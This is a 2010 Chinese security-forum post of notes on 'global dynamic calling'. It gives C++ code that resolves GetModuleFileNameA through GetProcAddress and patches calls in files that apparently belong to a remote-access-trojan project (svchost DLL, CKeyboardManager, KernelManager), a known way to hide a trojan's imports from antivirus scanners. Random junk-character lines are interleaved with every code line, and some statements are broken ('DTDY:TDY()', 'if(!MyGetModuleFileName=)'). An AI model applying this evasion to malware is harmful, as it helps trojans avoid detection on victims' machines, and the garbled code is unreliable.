标题:
[原创文章]
全局动态调用
[打印本页]
作者:
ice_xke
时间:
2010-10-19 12:30
标题:
全局动态调用
全局动态调用笔记
- t. r* ^# m5 w% ]2 `
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h
9 q' Y7 O9 Y" W& \8 P' a" v3 w
----------------------------------------
4 {1 w1 H( l0 J$ Q/ I0 k
DTDY.h:
4 |7 b G# p4 M1 q4 O0 h
! ]$ g) X* c7 Z2 d: W4 g" W
#if _MSC_VER>1000
1 D" O& F) _# s/ g
#pragma once
* F* f7 f4 Q) l. ^
#endif //_MSC_VER>1000
" |$ i! o: ]3 J! \
#include<windows.h>
0 S u, H" V+ b" ?3 P, d* Y$ E' C: M- ]
6 \1 r& ]! K$ y% A' f
typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);
& P" p5 i" o, E) f1 [
class DTDY
) } p( V* b& M* {( X0 g8 Z; H
{
7 n, I) t4 `. T* F
public:
K8 u2 t/ y( c- n
DTDY();
! _% C5 `2 n4 W2 N* _" B2 k
virtual ~DTDY();
; h$ n- e9 `( n; f6 a
public:
5 \- W6 H" w+ d; O3 F3 V. f; k
static pGetModuleFileNameA MyGetModuleFileName;
. o! E2 a/ y ^% l
static BOOL FunInitiallization();
. g) w* Q" O: D( c0 b
};
7 t! \- d& m3 Q
#endif
$ o7 v+ d( L; l2 f1 o
----------------------------------------
. }- v4 B) r, Y& ?1 |
; O; A9 _/ R1 X9 v
DTDY.cpp:
9 E7 f2 v7 z: Z) k
5 \/ Q8 q8 Y- N: q) \
#include "DTDY.h"
( u3 Z2 ?: {3 q/ Z+ i9 W+ }
pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;
! S. K" P. k) \" R
DTDY:TDY()
6 e' r* ?* u, B; i4 q
{
$ C" w8 q4 f* y( O0 D9 b- r
}
* w# I I' @3 z, v
DTDY::~DTDY()
, `' j2 q- K* }6 J8 S/ [/ Y' {
{
) ^, Q3 R7 ]/ n- i- s
}
3 o7 |8 Z2 _1 w U+ N" g0 Y
BOOL DTDY::FunInitiallization()
8 y/ A) w4 I" ^' M, z H- t
{
7 t' ~0 H9 A* i! r+ K J
HMODULE hModule=LoadLibrary("kernel32.dll");
2 G! u% i+ {. s* x
MyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");
/ f# t: O( f/ {- s2 Y
if(!MyGetModuleFileName=) return FALSE;
5 L3 c m D$ @, ~) m- `9 z; B. a
3 N9 I* e' Y: s- z( X
return TRUE;
3 @2 l- ]0 ` v" s- X
}
, D0 h- J1 V$ V# Q7 n0 R! t2 d5 Y
----------------------------------------
, |# r7 ?$ @! b" C; M( p
svchost.cpp:
. b. X9 l) d. l/ B( Z8 m
! H8 l( v4 u8 E6 p0 p; y8 C6 A
#include "DTDY.h"
% `! `& A6 U" ^8 [' x
) P8 v8 `/ U( M3 L4 V
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
/ B' d% I* z* l! ?+ ~! C* {. \( F
{
) \* g0 ]# R3 M1 E' R# P" D$ d
switch(ul_reason_for_call)
) q( f* ~. f1 @) Q6 f
{
# _: q/ r* m+ c8 [% s- U. o
case DLL_PROCESS_ATTACH:
$ `5 F/ e3 Y+ N1 x
if(!DTDY::FunInitiallization()) return FALSE;
. H4 Z( n3 Y; r$ J, C7 v* h
( a: x. ?- t4 u
break;
" ^4 j; L4 g% j9 Y# w: u
}
9 w0 Q& A: S, q' g) W
}
- r$ d6 x; g4 G. F
- O1 e' _* {; T" ^
, l; o7 ~! Y; _: O# V! p; V0 R6 C
GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def
$ h: |' G8 P5 l
改写为
* P, F4 d" ~! y+ t x6 A5 t
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));
& G% {7 i3 h3 n3 J; j
----------------------------------------
6 s. F: \+ t! r0 m
KernelManager.cpp:
1 @% A/ _0 p) w: _5 v$ `# Z
& H" G& u9 [: b' I8 f
#include "../DTDY.h"
# P$ K6 u; g- }4 Z# o
GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
b( A7 \" F, `( m3 g9 d" d) ?
改写为
) g8 V# C. k+ Z V9 B3 M* y
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
( g' `# _! X; a6 A% L
----------------------------------------
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2
